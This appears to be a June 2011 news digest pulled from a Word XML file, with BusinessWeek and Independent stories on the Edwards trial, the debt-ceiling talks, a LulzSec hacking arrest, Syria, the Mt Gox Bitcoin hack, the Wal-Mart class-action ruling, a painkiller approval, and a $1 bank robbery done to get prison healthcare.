reluctant to turn over all of the more-than-300,000 pages of evidence they had gathered in the Edwards case because some material involves witnesses who are "well-known individuals."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Tilley told Higdon that Edwards's defense team has a right to all evidence gathered against the former senator so they can properly interview witnesses against him.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P. Cooney III, one of Edwards's attorneys, said he worried the government's offer to turn over only part of the evidence they've collected in the case amounted to a "pig in a poke."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Putting Edwards's trial on a fast track would force defense lawyers to "read 5,000 docs a day, seven days a week" to get through the material, Cooney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criminal case is U.S. v. Edwards, 11-00161, U.S. District Court, Middle District of North Carolina (Greensboro).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Andrew Dunn, Stephen Farr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Jef Feeley in Wilmington, Delaware, at jfeeley@bloomberg.net; John Peragine in Winston-Salem, North Carolina at drjohnnd@hotmail.com.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Papandreou Succeed?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Bullish on China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The Destruction of Economic Facts Krispy Kreme Wants to Be Good for You Haptics Adds New Dimensions to Touchscreens The War Over Chinese Stocks in North America The Real U.S. Fiscal Crisis Is Joblessness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Krispy Kreme Wants to Be Good for You God's MBAs: Why Mormon Missions Produce Leaders The Big Business of Synthetic Highs The Destruction of Economic Facts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Real U.S. Fiscal Crisis Is Joblessness Yelp's Online Reviewing Mafia The Destruction of Economic Facts Online Anonymity: Painful and Priceless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Comparative Effectiveness IT Innovation General Motors IT Security Book Retailing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20:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-21/john-edwards-should-face-october-trial-prosecutor-says.html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Biden Debt-Reduction Talks Turn to Entitlements and Taxes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2011, 11:37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House Republicans Draft Letter on Warren Mortgage- Talks Role U.S. Confirms Afghan Taliban Talks as Karzai Criticizes Motives Taliban-U.S. Talks Б─≤Very Preliminary,Б─(tm) Defense Chief Says Obama, Boehner Join Forces to Negotiate Fairways, Not Budget Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas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Heidi Przybyla and Laura Litvan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(Bloomberg) - Vice President Joe Biden's bipartisan negotiators will dig into the issues that have divided them most - taxes and cuts in entitlements - as they try to determine whether they can agree on a large- scale debt- reduction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negotiators plan to meet today and at least two more times this week on a deficit-cutting plan Republicans are demanding before they will support raising the nation's $14.3 trillion debt limit. The talks, after focusing earlier on areas of likely agreement, turn this week to revenue increases and cuts to programs such as Medicare and Medicaid, according to a congressional aide who requested anonymity.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Failure to agree on major deficit cuts would mean the White House and lawmakers might have to settle for a short-term debt- limit increase as the legislative calendar closes in, said Robert Bixby, executive director of the Arlington, Virginia- based Concord Coalition, which promotes balanced budgets. Negotiators are aiming for cuts of as much as $4 trillion to attract Republican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see them getting $4 trillion in savings" for a long-term debt- reduction plan, Bixby said. "You're probably going to see a much smaller deal, and a much smaller increase in the debt limit, like a few months or a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Minority Leader Mitch McConnell raised such a prospect on CBS's "Face the Nation" on June 19.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Fallback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can't do something really significant about the debt ceiling," McConnell said, "then we'll probably end up with a very short-term proposal over, you know, a few months and we'll be back having the same discussion again in the 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may be a make-or-break week for the group, which is aiming for a plan by early July to allow it to be enacted before an Aug. 2 deadline. The House plans to be in recess next week and the Senate will be out of session the following week, meaning the houses won't be back in session together until July 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Biden's group of White House officials and six lawmakers-- four Democrats and two Republicans - first met on May 5. The group plans to lengthen its meetings this week from two hours to three.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Negotiators including Maryland Representative Chris Van Hollen, a Democrat, said they have so far focused primarily on discretionary and non-health related mandatory programs, making little progress on taxes and entitlements.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Democrats' Focus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talks have focused on a long-term extension of the debt limit, Van Hollen said on MSNBC yesterday, adding that he would consider a short-term increase only if a deficit-reduction pact can't be reached by Aug. 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been focused on trying to get a deal that would allow us to extend the debt limit to prevent us from defaulting, through the end of next year," Van Hollen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Republicans insist that spending cuts must exceed any increase in the debt ceiling. Many members of their party were elected last year on a pledge to force dramatic spending cuts.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Budget Committee Chairman Paul Ryan of Wisconsin said yesterday that President Barack Obama wants about a $2.2 trillion increase in the debt limit, about enough to last through the next presidential election in November 2012.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see the debt limit as our only opportunity to get some real fiscal responsibility," Ryan said in an interview on CNBC's "Squawk Box."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Our Strategy'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"Default is not our strategy," Ryan said. "But we don't want to see both political parties show the world and the credit markets that we just can't do anything about spending."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Secretary Timothy Geithner has said that, while he can make short- term transfers and take other steps to delay a breach of the debt ceiling, the U.S. will have to begin defaulting on its obligations in the first week of August unless Congress agrees to raise the limit.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Reserve Chairman Ben S. Bernanke last week said the U.S. debt ceiling shouldn't be used as a bargaining chip to force budget cuts and that failing to raise it could cause "severe disruptions" in financial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 said last month he was aiming for a $1 trillion "down payment" on spending cuts, along with a series of longer-term benchmarks that could be enforced to reduce the debt by $4 trillion.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Republicans have insisted they won't approve any tax increases. Still, Democrats say there is increased hope for a deal on revenue after a June 16 Senate vote in which 33 Republicans voted with Democrats in favor of eliminating a tax credit and a tariff that subsidize ethanol production.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 Code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Senator Lindsey Graham said on NBC's "Meet the Press" two days ago that while Republicans won't allow an increase in tax rates, "many of us would look at flattening the tax code, do away with deductions and exemptions and take that revenue to help pay off the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view conflicts with the stance of Americans for Tax Reform's Grover Norquist, who insists that any elimination of tax breaks must be accompanied by an equal reduction in taxes elsewhere. Forty of 47 Republican senators have signed his no- tax-increase pledge.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Bixby said prospects for a large-scale deficit-reduction deal may hinge on the willingness of Republicans to end some tax breaks, combined with an agreement by Democrats to make some changes to Medicare.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Democrats rule out cutting Medicare benefits, Bixby suggested they might agree to raise premiums paid by wealthier beneficiaries for some coverage, such as prescription drugs and doctors' appointments.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reducing Medicare, but it is charging more for the existing benefits," he said. "We have to have some flexible thinking like that, or there won't be a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Laurie Asseo, Robin Meszoly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Heidi Przybyla in Washington at hprzybyla@bloomberg.net; Laura Litvan in Washington at llitvan@bloomberg.net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Papandreou Succeed?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Bullish on China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The Destruction of Economic Facts Haptics Adds New Dimensions to Touchscreens Krispy Kreme Wants to Be Good for You The War Over Chinese Stocks in North America The Real U.S. Fiscal Crisis Is Joblessness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Krispy Kreme Wants to Be Good for You The Big Business of Synthetic Highs The Destruction of Economic Facts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Real U.S. Fiscal Crisis Is Joblessness The Destruction of Economic Facts Yelp's Online Reviewing Mafia Online Anonymity: Painful and Priceless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Small Business Tax Deductions Business Taxes IT for Oil and Gas Business-to-Business Marketing Broadway and Live Theater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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-21/biden-debt-reduction-talks-turn-to-entitlements-and-taxes.html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London Police Arrest 19-Year-Old in Sony, CIA Hacking Probe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2011, 11:38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News Corp. Unit to Pay Gray $32,400 to Settle Hacking Case Iran Shipping Firm Faces Charges in Money-Moving Scheme Fukushima Failures Kept Behind Closed Doors at IAEA Meeting Banks, Finance Firms Targeted by EU in Crackdown on Data Privacy Facebook Message From U.K. Juror Will Lead to Jail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Lindsay Fortado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LulzSec comment in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(Bloomberg) - London police arrested a 19-year-old man suspected of being involved in a hacking attack on Sony Corp. and the U.S. Central Intelligence Agency.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arrest was a "pre-planned intelligence-led operation" as part of an investigation into hacking of international business and intelligence agencies, the Metropolitan Police said in a statement today. Police called it "a significant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police searched a residence in Essex, England, last night after the man's arrest, which "led to the examination of a significant amount of material." The man, who wasn't identified, is being questioned at a police station.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looking into whether the suspect is associated with Lulz Security, known as LulzSec, or Anonymous groups. LulzSec has claimed credit for breaking into websites at Sony and the U.S. Senate, while Anonymous said in April it would wage a cyber war against Tokyo-based Sony for trying to prevent people from tinkering with PlayStation 3 game consoles. Daichi Yamafuji, a spokesman for Sony,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"Seems the glorious leader of LulzSec got arrested, it's all over now... wait... we're all still here!" the group wrote on its Twitter feed following the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19-year-old was arrested on suspicion of violating the Computer Misuse Act and offenses under the Fraud Act, police said. He is also under suspicion for being involved in hacking the computers at the U.K.'s Serious Organised Crime Agency.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‘Quality Entertainment'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which calls itself "the world's leaders in high- quality entertainment at your expense," claimed credit for the attack on its Twitter feed yesterday. "Tango down - soca.gov.uk - in the name of #AntiSec," the group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Stuart Hadley, a spokesman for SOCA, said the agency was forced to take its website offline temporarily after being targeted with a distributed denial of service attack. No operational data was accessed,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attacks require little knowledge and consist of exhausting a computer's resources, London police have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CIA's public website was taken down on June 15. LulzSec claimed credit for the attack, saying on its website, "We don't like the U.S. government very much." A CIA spokesman said at the time the agency was looking into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Spanish police arrested three suspected members of the Anonymous on June 10. The group hacked the websites of Banco Bilbao Vizcaya Argentaria SA, Spain's second-biggest bank, and Enel SpA, the Italian owner of Spanish power company Endesa, Spanish police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composed of hundreds of hackers and activists in several countries, gained attention in December when it targeted EBay Inc.'s PayPal unit, Visa Inc. and other companies deemed hostile to WikiLeaks, the anti- secrecy group that published U.S. military documents and diplomatic communications on its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police in January arrested five males, including three teenagers, as part of a probe of corporate cyber attacks related to WikiLeaks. Hours later in the U.S., agents of the Federal Bureau of Investigation executed 40 search warrants in a similar investigation.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Aoife White in Brussels and Erik Larson in London. Editors: Christopher Scinta, Anthony Aarons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for this story: Lindsay Fortado in London at lfortado@bloomberg.net.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Anthony Aarons at aaarons@bloomberg.net.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Papandreou Succeed?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Bullish on China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The Destruction of Economic Facts Haptics Adds New Dimensions to Touchscreens Krispy Kreme Wants to Be Good for You The War Over Chinese Stocks in North America The Real U.S. Fiscal Crisis Is Joblessness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Krispy Kreme Wants to Be Good for You The Big Business of Synthetic Highs The Destruction of Economic Facts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The Real U.S. Fiscal Crisis Is Joblessness The Destruction of Economic Facts Yelp's Online Reviewing Mafia Online Anonymity: Painful and Priceless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Sony London Metal Exchange (LME) Information Security Business and Terrorism Cyber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19:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-21/london-police-arrest-19-year-old-in-sony-cia-hacking-probe.html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Syria Faces More International Pressure After Assad's Address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2011, 5:06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Syria Drives Wedge Between ErdoganБ─(tm)s Arab Allure, Friends NATO Acknowledges It Conducted Airstrike on Sorman in Libya Assad Calls for Talks, Says Syria Unrest Sparked From Abroad NATO Acknowledges Possible Civilian Casualties in Tripoli Strike Yemeni Clerics Seek SalehБ─(tm)s Removal, Elections in 60 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Glen Carey and Inal Ersan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21 (Bloomberg) - International pressure on Syria increased after President Bashar al-Assad called for a national dialogue on political change and blamed anti-government protests on a foreign conspiracy.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President Barack Obama and Turkish Prime Minister Recep Tayyip Erdogan "underlined the necessity to speed up the reform process in Syria in order to meet the demands of the Syrian people," according to a statement on the website of Erdogan's office today after the leaders spoke by telephone.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"complete and absolute conviction in the process of reform because it represents the interest of the homeland," Assad said yesterday in a speech carried live on state television from Damascus, the capital. "The problem is which reform we want and what are the details." He said the unrest is a "conspiracy" hatched abroad.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Assad's 11-year rule began in mid-March as part of a wave of demonstrations across the Middle East and North Africa this year that has unseated the leaders of Egypt and Tunisia. Yemeni President Ali Abdullah Saleh is in Saudi Arabia for medical treatment for injuries sustained during an attack that followed months of anti-government rallies.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Foreign Secretary William Hague wrote on his Twitter Inc. feed yesterday that Assad's speech contained "little new on how reforms will be implemented and when, or how he will end violence." Italian Foreign Minister Franco Frattini told reporters "there is still a disconnect between what the international community is expecting and what he is doing."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Speech Prompts Protests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Demonstrations erupted across Syria as protesters expressed disappointment with Assad's address, saying it didn't meet their demands for political change, Al Jazeera television reported. Rallies were held in the suburbs of Damascus and in the cities of Homs, Hama, Latakia, Albu Kamal and Daraa, as well as in towns near Daraa, where the protests began, the network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Israeli Defense Minister Ehud Barak said Assad may be forced out within six months, the Associated Press reported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 "ended up using too much brutal force, too many graves have been dug and he lost practically his legitimacy in the eyes of the Syrian people," Barak told the AP yesterday. "He probably will stay around for another quarter or two but that will not change his fate."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 issued an amnesty for people who committed crimes before June 20, state-run news agencies said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Assad's speech was his third since the Syrian unrest started. In April, he said the lack of a connection between the government and its people had created popular anger. A month earlier, he said there will be a new parliament and local administrations after elections scheduled for August.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Resolving ‘Issues'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demands of Syrians he has met with "are with merit," citing examples of calls for justice, jobs, security and greater democracy. "We have started to resolve these issues,"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protests are the biggest challenge to the Assad family since 1982. That year, Assad's father and predecessor, President Hafez al-Assad, used the army to crush an uprising led by the Muslim Brotherhood movement and focused on the city of Hama. Thousands of people were killed. The Assads are from the Alawite minority in the Sunni Muslim-majority country of more than 21 million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Syrians need to decide "first if we want to amend some articles in the constitution or to change the constitution," Assad said. He also said a national dialogue may delay the August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dialogue is very important," Assad said. "We have to give it a chance because the whole future of Syria, if we want it to succeed, must be built on this dialogue."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 created a committee that is to prepare the ground for the national dialogue, state-run television reported June 1. He also issued a decree in April approving a new government, led by former Agriculture Minister Adel Safar.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total of 1,289 civilians and 332 members of the security forces have been killed since Assad's regime cracked down on dissent, the Syrian Observatory for Human Rights said June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protests have been marked by "vandalism, murder and the destruction of private property," and the demonstrators are being paid,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Syrians have been crossing into Turkey since June 8 to escape the violence. The number of Syrians fleeing the unrest increased to 10,639, Turkey's state-run Anatolia news agency reported yesterday. The refugees should return home,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forces were deployed in the north around Ma'arrat an Nu'man June 17 after the army swept through the town of Jisr al- Shughour earlier this month. The operation was "to prevent terrorists" from cutting the highway linking Damascus to the second-largest city, Aleppo, state television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is being affected by the unrest and "confidence" must be restored, Assad aid. "The worst we could face is a weakened or collapsed Syrian economy,"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Lina Ibrahim in Damascus, Mariam Fam in Cairo, Andrew Davis in Luxembourg and Steve Bryant in Ankara. Editors: Heather Langan, Ben Holland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Glen Carey in Riyadh at gcarey8@bloomberg.net; Inal Ersan in Dubai at iersan@bloomberg.net.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Andrew J. Barden at barden@bloomberg.net; Shaji Mathew at shajimathew@bloomberg.net.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Sega Sammy Hacked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Skype Fires Executives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The Destruction of Economic Facts Haptics Adds New Dimensions to Touchscreens Krispy Kreme Wants to Be Good for You The War Over Chinese Stocks in North America The Real U.S. Fiscal Crisis Is Joblessness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Cheating, Incorporated The Real U.S. Fiscal Crisis Is Joblessness Apple Raises the Stakes in Patent Battle With Samsung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Customer Service: Marketer vs. Merchant The Real U.S. Fiscal Crisis Is Joblessness Stocks and Bonds Are Bullish on the Economy B-School Research Takes on Office Politics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International Finance International Monetary Fund (IMF) International Development Bank for International Settlements Boutique Hotels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13:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-21/syria-faces-more-international-pressure-after-assad-s-address.html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Hack attack pushes Bitcoin to the brink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Stephen Foley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Tuesday, 21 June 2011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an online currency beloved of libertarians and technophiles, which had been threatening to break into the mainstream, was facing the worst crisis of its two-year existence last night after hackers brought down its biggest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an apparent attempt to steal the contents of users' online accounts and convert them into real money, is the latest in a string of disasters to hit Bitcoin in the past few weeks, raising questions over whether the currency has a future.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UK, supporters of Bitcoin made an urgent appeal to the Financial Services Authority to regulate the largest London-based exchange, so as to reassure people that using Bitcoin is safe. "Unregulated businesses don't usual cry out for regulation," said Donald Norman, co-founder of the exchange Britcoin. "But because we are unusual, and because we are dealing with people's money, and because of all the scary stories around Bitcoin, we would like nothing more than to have a government authority looking into our accounts - especially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exact nature of the attack on the Japan-based Mt Gox exchange was not immediately clear. Mark Karpeles, who runs Mt Gox, said attackers gained access to a computer that had details of all account users and their encrypted passwords. As of last night, the company was still running "intrusion tests", as rumours swirled about how much money might have been stolen in the heist.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invented as an open source project in 2009 as a decentralised alternative to real world currencies. By setting an absolute limit on the amount of Bitcoins that could be created, its adherents believe, the currency could one day become a "gold standard" against which government- operated currencies could be valued. The currency could also become an easy way to conduct commerce online, away from expensive taxation, regulation and bank fees.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2pm, New York-time on Sunday, the number of Bitcoins in existence were worth more than $100m (ё61.7m), on electronic exchanges that valued them at $17.50 apiece. Moments later, the price appeared to crash to just pennies, because of irregular trading on Mt Gox.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disaster will fuel the online debate over whether Bitcoin can become a serious currency, or is simply too volatile. As mainstream interest began to take off last month, the US dollar-value of Bitcoins surged 1,000 per cent. Earlier this month, it crashed by 30 per cent on a single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Hundreds of small online merchants and Bitcoin adherents have started to accept the currency as payment for goods and services, though no major retailers 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has started to attract the attention of politicians in the US after reports that Bitcoins have been used to purchase illegal drugs. Last month, US Senator Chuck Schumer called Bitcoin "an online form of money laundering used to disguise the source of money".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Independent.co.uk 2011.06.21 05:22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.independent.co.uk/news/business/news/hack-attack-pushes-bitcoin-to-the-brink-2300384.html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Wal-Mart Ruling Hurts Bias Cases, May Spare Other Class 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4:48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Wal-Mart Million-Worker Bias Suit Thrown Out by High Court Climate Change Suit Against Utilities Rejected by Top Court PfizerБ─(tm)s Bid to Appeal $58 Million Prempro Jury Award Denied Facebook, Primary Global, WaMu, Credit Suisse in Court News Los Angeles Dodgers Owner, Ex-Wife Settle Divorce Dispute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Cronin Fisk and Greg Stohr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U.S. Supreme Court's rejection of a nationwide class action for female workers suing Wal-Mart Stores Inc. doesn't foreclose the ability of employees to bring similar suits for many other types of claims against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ruling "is adding a higher burden" of proof before an employment discrimination class action can be certified, said Cyrus Mehri, a Washington lawyer who represents workers in such cases. Plaintiffs lawyers said other class actions against companies, including those alleging bias over a written company policy, product liability for items such as defective medicines or claims against banks for illegal fees, may not be affected.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a class certified, there will have to be a closer link between cause and effect," said Mehri, who recently won a $32 million settlement in a gender bias lawsuit against Wells Fargo &amp; Co. "In the employment area, it's a steeper climb for plaintiffs."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Class certification allows workers to pursue their claims as a group, pooling resources and putting greater pressure on defendants to settle. Companies often seek to avoid classes, instead attempting to fight employees one-by-one, forcing them to use their own financial resources to litigate.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Supreme Court today said lawyers for women suing Bentonville, Arkansas- based Wal-Mart failed to point to a common corporate policy that led to gender discrimination at thousands of its U.S. stores. The court said the women couldn't pursue their claims in a nationwide class action because they hadn't shown a sufficient connection between their claims.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Convincing Proof'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respondents provide no convincing proof of a companywide discriminatory pay and promotion policy, we have concluded that they have not established the existence of any common question," Justice Antonin Scalia wrote for the majority, reversing a lower court ruling. Use of statistical and anecdotal evidence to show managers discriminated and exercised these decisions in a common way fell "well short,"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ruling limits the ability of plaintiffs' lawyers to win multimillion dollar damages through a single lawsuit, particularly against employers. Units of Cigna Corp., Goldman Sachs Group Inc., Bayer AG, Toshiba Corp., Publicis Group SA, Deere &amp; Co. and Costco Wholesale Corp. all face gender discrimination complaints that seek class-action status.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20 companies supported Wal-Mart at the Supreme Court, including Intel Corp., Altria Group Inc., Bank of America Corp., Microsoft Corp. and General Electric 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Pattern of Discrimination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filed in 2001, claimed Wal-Mart engaged in a pattern of discrimination against women in pay and promotions nationwide and sought to cover every woman who worked at the company's stores from 1998 onward.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"reversed about 40 years of jurisprudence," said Joseph Sellers, attorney for the women suing Wal-Mart. The decision forces a consideration of the merits of a claim at the class certification stage, contrary to prior practice, Sellers said at a press conference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Sellers and co-counsel Brad Seligman said the lawyers would be pursuing individual actions against the company and may pursue smaller class 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number of options still available," he said. "None of them are as efficient" as a nationwide class action. "Wal-Mart may regret the day" it sought a rejection of class certification,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not over," said Seligman. "Wal-Mart is not off the hook."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Women Nationwide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12,000 women nationwide have contacted the lawyers suing Wal-Mart to join the case, Seligman said. The company said in a statement that the ruling "effectively ends this class- action lawsuit."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plaintiffs' claims were worlds away from showing a companywide pay and promotion policy," Wal-Mart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Mehri said the justices added a new hurdle for plaintiffs.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plaintiffs' lawyers seeking to have a class action allowed "had to show that there is a common issue of fact," the lawyer said. Today's decision would require lawyers to "show that the common issue predominates,"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Plaintiffs' lawyers would have to provide more evidence before seeking a class certification decision,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has to be greater proof of causation, so you see the disparities," Mehri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may have limited effect on some other pending bias class actions, said Seligman. He is also representing women suing Issaquah, Washington-based Costco over gender discrimination. "Costco was a much narrower case," covering two types of managers who were affected by decisions made above the store level,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‘Very Specifically'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justices "focus very specifically on our case," Seligman said of today's ruling. "It's not at all clear on the impact" on these other cases,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decision may change how plaintiffs' lawyers pursue claims, Mehri said. While the decision doesn't affect cases already settled, it may alter a lawsuit he's pursuing claiming gender bias against Ruth's Chris Steak House, Mehri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be informed by the Supreme Court on how we shape our filings," he said. "It doesn't stop the case by any stretch."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isn't likely to affect other class actions alleging other types corporate wrongdoing, said attorney Michael Donovan, who represents Wal-Mart workers in Pennsylvania suing the company over wage-and-hour claims.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it has that much significance for most general class actions," Donovan said in an interview. "It was pretty much tied to whether the plaintiffs could prove a companywide policy or practice of discrimination."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Manager Discretion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plaintiffs claimed in the Wal-Mart case that allowing individual store managers' discretion to make their own decisions may provide the basis of a disparate impact theory - that women were affected more adversely than men by the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judges found that such a theory can be pursued in a class action lawsuit, that the claim can "exist does not lead to the conclusion that every employee in a company using a system of discretion has such a claim in common," Scalia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workers' lawyers "have identified no ‘specific employment practice' - much less one that ties all their 1.5 million claims together," Scalia wrote. "Merely showing that Wal-Mart's policy of discretion has produced an overall sex- based disparity does not suffice."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Donovan said this aspect of the ruling "makes it difficult for employees to sue for corporate culture claims where there isn't any direct evidence but for the impact." Lawsuits outside the employment arena often have business records plaintiffs can use to prove claims, he noted.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Preclude Class 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Supreme Court decision would only preclude class actions in lawsuits where there wasn't some sort of test or policy or uniform condition, or business records pointing to those items, Donovan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 a whole lot of cases like that out there."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ruling makes pursuit of discrimination class actions "very difficult," said David Sanford, a Washington lawyer who won a $175 million settlement in a gender bias suit against Novartis AG.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impossible. It hasn't closed the door, but it's made the challenge much harder," Sanford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Supreme Court has articulated a view that if you have a policy of not discriminating, and if you have a company that's big, and you're a plaintiff suing that company, if you cannot identify a policy that suggests sex discrimination, then you're in trouble,"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Lawyers representing workers may begin filing claims with subclasses, rather than as companywide actions,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Bias Suits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Sanford has multiple bias lawsuits seeking class action status against companies including Philadelphia-based Cigna, Bayer, Eaton Corp. and Toshiba. All these cases are in "fairly early stages of litigation," and motions for class certification haven't been filed,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precise impact of today's decision on these cases hasn't been determined,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going to have to look at it very carefully,"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Sanford said he used the same theory of law in his Novartis case that lawyers for the Wal-Mart plaintiffs used in theirs - that the company's policies allowed a disparate impact on pay and promotions for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a theory that plaintiffs won't be able to avail ourselves of going forward," he said. "We're going to have to look at ways to alter our theory."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change that may result from today's ruling is to the plaintiffs' employment bar, Sanford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aren't many plaintiffs lawyers who do this work," he said. "That number will shrink further."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Wal-Mart Stores v. Dukes, 10-00277, U.S. Supreme Court (Washington)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David E. Rovella, Patrick Oster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Cronin Fisk in Southfield, Michigan, at mcfisk@bloomberg.net and; Greg Stohr in Washington at gstohr@bloomberg.net.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Sega Sammy Hacked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Skype Fires Executives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Apple Raises the Stakes in Patent Battle With Samsung How Sweden Steered Clear of the Greece Fiasco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How Sweden Steered Clear of the Greece Fiasco The Big Business of Synthetic Highs MBA Pay: The $3.6 Million Degree Krispy Kreme Wants to Be Good for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Sweden Steered Clear of the Greece Fiasco God's MBAs: Why Mormon Missions Produce Leaders Yelp's Online Reviewing Mafia Apple Raises the Stakes in Patent Battle With Samsung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Middle Class Finances Health 2.0 Search Engines High- Speed Rail Education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00:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/wal-mart-ruling-hurts-bias-cases-may-spare-other-class-actions.html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Acura Rises After Pfizer-Partnered Painkiller Wins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4:28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Dex One, Gentiva, Harbin Electric, Molycorp: U.S. Equity Movers Facebook, Primary Global, WaMu, Credit Suisse in Court News GoogleБ─(tm)s Admeld Purchase Slated for Justice Department Review Jiau Jury Starts Weighing Charges of Hedge Fund Insider-Trading J&amp;J Wins Trial Over Claims Antibiotic Levaquin Caused Injuries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Larkin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close of trading in first, second paragraphs.)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Acura Pharmaceuticals Inc., a maker of technology to deter drug abuse, rose the most in 11 weeks in Nasdaq trading after U.S. regulators approved its short-acting painkiller Oxecta.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Palatine, Illinois-based company climbed 63 cents, or 16 percent, to $4.50 at 4 p.m. New York time in Nasdaq Stock Market composite trading. It was the stock's biggest percentage increase since April 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Acura said in a regulatory filing today that it will receive $20 million from Pfizer Inc. as a result of the Food and Drug Administration approval. Pfizer, the world's biggest drugmaker, acquired marketing rights to the pain medicine, formerly known as Acurox, in its $3.3 billion purchase of King Pharmaceuticals in March. Sales of the pills may be limited to $30 million a year because they don't guard against intentional overdose, according to Ian Sanderson, an analyst at Cowen &amp; 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Acura technology does prevent them from being crushed and snorted and chewed, the primary means of abuse is still wide open," Sanderson said in a telephone interview from Boston. "It really does not have a lot of commercial potential."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FDA in 2009 rejected the original Acurox formulation that included niacin, a vitamin that causes redness and irritation of the face when taken in excess.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Study Requirement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Acura said it expects Pfizer will begin selling Oxecta late in the third quarter or early in the fourth quarter of this year. The FDA is requiring New York-based Pfizer to conduct a study to examine whether the medicine decreases the consequences of abuse and misuse.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recognize our responsibility to physicians and patients and remain committed to appropriate access to pain treatment and developing medicines to potentially address this important public health and safety issue," said Olivier Brandicourt, president and general manager of Pfizer's primary care division, in a separate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Oxecta is Acura's first product. The company is entitled to royalties on sales ranging from 5 percent to 25 percent, according to the 2007 agreement with King Pharmaceuticals. Most competing medicines are generic and sold at lower prices than brand-name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abuse of opioid painkillers occurs with extended- release versions. Pfizer is also developing Remoxy, a tamper- resistant form of long-acting oxycodone that is working with Pain Therapeutics Inc. of Austin, Texas, and Cupertino, California-based Durect Corp. The FDA is scheduled to rule on that new drug application by June 23.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Alex Nussbaum in New York. Editors: Bruce Rule, Chris Staiti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Larkin in Washington at clarkin4@bloomberg.net.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Adriel Bettelheim at abettelheim@bloomberg.net.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Sega Sammy Hacked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Skype Fires Executives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Apple Raises the Stakes in Patent Battle With Samsung How Sweden Steered Clear of the Greece Fiasco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How Sweden Steered Clear of the Greece Fiasco The Big Business of Synthetic Highs MBA Pay: The $3.6 Million Degree Krispy Kreme Wants to Be Good for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Sweden Steered Clear of the Greece Fiasco God's MBAs: Why Mormon Missions Produce Leaders Yelp's Online Reviewing Mafia Apple Raises the Stakes in Patent Battle With Samsung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Manufacturing Pakistan Economy Investing in Commodities China's Economy Gay and Lesbian Retirement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2011.06.21 00:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-20/acura-rises-after-pfizer-partnered-painkiller-wins-approval.html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Man politely robs bank for $1, lands free healthcare in prison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O_O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9th, 59 year-old James Richard Verone made a decision that would hopefully change his life for the better: he decided to rob a bank for the grand total of $1. Now, how in the world could robbing a bank result in a reward that could better someone's life? Free healthcare, that's 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in a county right next to my very own, a man sits in prison, thankful for the opportunity to be provided free healthcare after being unable to get assistance via alternate avenues - including filing for disability, applying for early Social Security, homeless shelters, and seeking medical help through charitable organizations - for the serious health issues he had been developing. To quote the Gaston Gazette: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Verone didnБ─(tm)t want to scare anyone. He executed the robbery the most passive way he knew how. He handed the teller a note demanding one dollar, and medical attention. Б─°I didnБ─(tm)t have any fears,Б─² said Verone. Б─°I told the teller that I would sit over here and wait for police.Б─²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teller, however, did have some fears even though Verone never showed a weapon. Her blood pressure shot up and once Verone was handcuffed by police, the teller was taken to Gaston Memorial Hospital to be checked out. Verone said he was sorry for causing the woman any pain.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where he stands on the issue of socialized medical care, Verone had the following to offer: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Verone says heБ─(tm)s not a political man. But he has a lot to say on the subject of socialized medical care. He suspects he wouldnБ─(tm)t be talking to a reporter through a metal screen wearing an orange jumpsuit if such an option were available in the U.S. Б─°If you donБ─(tm)t have your health you donБ─(tm)t have anything,Б─² said Verone. The man has high hopes with his recent incarceration. He has seen several nurses and has an appointment with a doctor Friday. The ideal scenario would include back and foot surgery and a diagnosis and treatment of the protrusion on his chest, he said. He would serve a few years in prison and get out in time to collect Social Security and move to the beach.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so much attention is being given to those who are hacking into computer systems these days, folks like Verone are busy "hacking" into other types of systems, themselves! Naturally, while his plan is quite clever and innocent in nature, this will not sit well with a number of tax- payers - not just for the fact that the man had to do this in the first place, but that he could do it to get what he knew he would receive.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type of thing isn't new, though; maybe this scenario, but crime happens regularly by individuals who just want to have a roof over their head and food to eat. Might as well add healthcare to the list of reasons to rob a bank, right? To close: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Verone said he hears the other men talk about the revolving door that jail has become for them. He hopes he 